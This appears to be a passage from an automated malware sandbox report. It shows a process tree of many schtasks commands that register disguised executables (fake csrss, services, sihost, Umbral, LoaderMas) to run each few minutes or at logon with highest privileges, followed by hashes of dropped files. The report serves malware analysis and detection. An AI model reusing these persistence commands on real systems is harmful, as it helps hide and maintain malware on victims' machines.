C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sysmons" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\sysmon.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Portable Devices\powershell.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:656
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "powershellp" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\powershell.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2256
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1396
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Default User\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4400
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2248
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Cookies\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3716
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Users\Default\Cookies\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Users\Default\Cookies\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Windows\ServiceProfiles\wininit.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3860
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1940
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wininitw" /sc MINUTE /mo 8 /tr "'C:\Windows\ServiceProfiles\wininit.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Sidebar\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3568
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Sidebar\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UmbralU" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\Umbral.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Umbral" /sc ONLOGON /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\Umbral.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1212
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UmbralU" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows Sidebar\Shared Gadgets\Umbral.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5096
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 7 /tr "'C:\perfdhcpSvc\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\perfdhcpSvc\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:744
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4952
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 11 /tr "'C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Registry.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3520
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Registry.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Nurik\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1144
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Nurik\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\Nurik\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4676
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\root\rsod\sppsvc.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4144
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\root\rsod\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5080
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office\root\rsod\sppsvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3204
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "LoaderMasL" /sc MINUTE /mo 7 /tr "'C:\Users\Public\LoaderMas.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2360
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "LoaderMas" /sc ONLOGON /tr "'C:\Users\Public\LoaderMas.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "LoaderMasL" /sc MINUTE /mo 9 /tr "'C:\Users\Public\LoaderMas.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4040
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\perfdhcpSvc\unsecapp.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2020
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecapp" /sc ONLOGON /tr "'C:\perfdhcpSvc\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3580
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "unsecappu" /sc MINUTE /mo 7 /tr "'C:\perfdhcpSvc\unsecapp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3576
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\PrintDialog\Assets\csrss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\PrintDialog\Assets\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1464
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Windows\PrintDialog\Assets\csrss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4992
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UmbralU" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Searches\Umbral.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:936
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Umbral" /sc ONLOGON /tr "'C:\Users\Admin\Searches\Umbral.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2704
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UmbralU" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Searches\Umbral.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 10 /tr "'C:\perfdhcpSvc\services.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:368
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\perfdhcpSvc\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2568
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\perfdhcpSvc\services.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:548
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57f3c0ae41f0d9ae10a8985a2c327b8fb
SHA1d58622bf6b5071beacf3b35bb505bde2000983e3
SHA256519fceae4d0dd4d09edd1b81bcdfa8aeab4b59eee77a4cd4b6295ce8e591a900
SHA5128a8fd17eef071f86e672cba0d8fc2cfed6118aff816100b9d7c06eb96443c04c04bc5692259c8d7ecb1563e877921939c61726605af4f969e3f586f0913ed125
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
948B
MD5c9b6705519e1eef08f86c4ba5f4286f3
SHA16c6b179e452ecee2673a1d4fe128f1c06f70577f
SHA2560f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705
SHA5126d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7
-
Filesize
1KB
MD588be3bc8a7f90e3953298c0fdbec4d72
SHA1f4969784ad421cc80ef45608727aacd0f6bf2e4b
SHA256533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a
SHA5124fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c
-
Filesize
944B
MD54eca582877fff3abc42079f583f982af
SHA1d084a5d61da23a81a4f13d0eac10f48fbde8b61b
SHA256fe13f58df91c349f796584295109f730dad7f4eb29bcca5e5b58e7f444aa4ab4
SHA512ad164f3ed95cfcc2a3c359e9891a723296871f5372a05a61888ed708ba346d903ca5229143a504bdfc7f2d487a58c418aeaedcd0c412ad25371cdf0f8d1d1c6f
-
Filesize
944B
MD59c740b7699e2363ac4ecdf496520ca35
SHA1aa8691a8c56500d82c5fc8c35209bc6fe50ab1d9
SHA256be96c91b62ba9ba7072ab89e66543328c9e4395150f9dbe8067332d94a3ecc61
SHA5128885683f96353582eb871209e766e7eba1a72a2837ce27ea298b7b5b169621d1fa3fce25346b6bfd258b52642644234da9559d4e765a2023a5a5fc1f544cc7af
-
Filesize
944B
MD522310ad6749d8cc38284aa616efcd100
SHA1440ef4a0a53bfa7c83fe84326a1dff4326dcb515
SHA25655b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf
SHA5122ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
194B
MD5359a0ea7b6f421d9e0023c6961c66690
SHA1d9eeb36d482c2da0b4e1d8e1e72492b2725822d2
SHA2568da91e72c1c14a6ca8d7f0e47c8bc91f8b4286082a15a788a8816a836e45aa9c
SHA512324ada4d0bb298f21c0f81d5e185cd6ec35617726f2822365c4a99ce169c4e4ba7336396cd45999d6f6efab2029ba63fd8139fee29b9c13bd942027e42ae921a
-
Filesize
63KB
MD5a0dbdf3af38ead2237ccb781a098a431
SHA11434296af6c5530eb036718e860490e0adc3321a
SHA2566f483da6b36646bf6f33db0c210bd3683ff29428a44d916a2f26a4240c1a9901
SHA512dd7dc91a2e09b0c3906efbb486fb84d0289dc61338afd75d203f1ab2f49556c9523a8a9abc913363a45dde8194f5b2ee9d3d659807250047331944c39006edc3
-
Filesize
18.2MB
MD5ed965403e795c3b563d67c734472ad93
SHA16b8b929239d5ef8f1f546c591c67acaf560de4dc
SHA2566b7473e7177ef0666f6afe36b257d0730dababefc209ee1c5f2da319dbe1633d
SHA512bd860103c5ac1bcc02bfefc669616a1b0103dfb3c611b0e4499cf4b1fc67d49c9cd57c1839936b75e0f0008aec0f84cb0af712feb334957972661405a137f649
-
Filesize
17.9MB
MD5e504e3fc36fe4d6f182c98923979a779
SHA13ba9f1a9a15b79639a20cfcf79c9de31d15a17a6
SHA25670b7b95bb952b3325476867307fc5bd4df5769b97bbcdd8b60e7b46e1b38e4a0
SHA51263bbbc3ccf14b2846df64b8edae52b6431df52aa9e03569a28ca239ab02db94bf79ca8a0a30529e35a04ee5845768d752b99e6ce3830ab440c57850180ad1647
-
Filesize
229KB
MD5f48ef033300ec9fd3c77afff5c20e95f
SHA122d6125b980474b3f54937003a765cdd5352f9a8
SHA25672ee11a905ca278130f02397422b4cc4944851065ce0072f9888b70c5ad40f1e
SHA512847ee8cdb14879089c861168d6be90325304df490668a38447b37772423e6dab5e32a5df344ceb58410d3b24cf25cd7221e8768951e5aca14820996a1e8304bc
-
Filesize
1.1MB
MD5d85bd59cf0808fb894f60773e1594a0a
SHA184b9d205f3ae6ca4f8f1bb938ee8b4d452444cde
SHA256f3ef597673421e514d7fed82b40d65386c3811c4a8f5553afd59fc632bca8746
SHA512225788e3e98449f53e6206c585315a37c9ff6ed0b5425b2a98e50c7ac45ab3c187ccf7626f126ba300bd8dbdf89c864e89f85d6264edc89281745b081ec58f97
-
Filesize
827KB
MD5d2ec227ddac047e735393e58e742fd44
SHA17aae5c76378f7cfcff8bb983695fa4c2577a20e2
SHA2560e679527f2df9f87d33c82023256fac276c36006579d2d71877ccab4be847cce
SHA5125a11b292a574bd2ca6c225af1e4c9f95004a49ce816cc59a73d4ab6e2a0b007a58ab56e5e0c004901c3ebe4ec06054e6e801f8e659711856857add6d43f38979
-
Filesize
200B
MD500b53f3e200522631227cac1a07e0646
SHA1a0c69d58c7ca10f5fd5e1320b1b2f92081d7fcfe
SHA256486c050aadc42906113b0c5c8485dff36b0187f343a732542608a91b0565146c
SHA51222241ae8a31c7e564c9fb652947e4fe17f80c6e94dfe1a3bb5890f6eb97797ee32ccfff5d647eef02bda31bd47c5d95521cd0c6349a01e501e6e064ea6306243
-
Filesize
34B
MD5a9330c6da12d90d5d956ae2bbcf017d7
SHA17ebaa14eed80db6d9f0c0c0f1ecab1a9c3f61410
SHA256b49853470383dce14680f656aca7ea449b1d6aabb3f18d4165ebd7e3e7545393
SHA512557c91cc1cc0d7309f50e286644a2da543c0283d4a1659f7d31554282ddc48b5f972d98d5a01433078fdbe6cc813bb6f7c120e2307fae48c5d81be44ae823228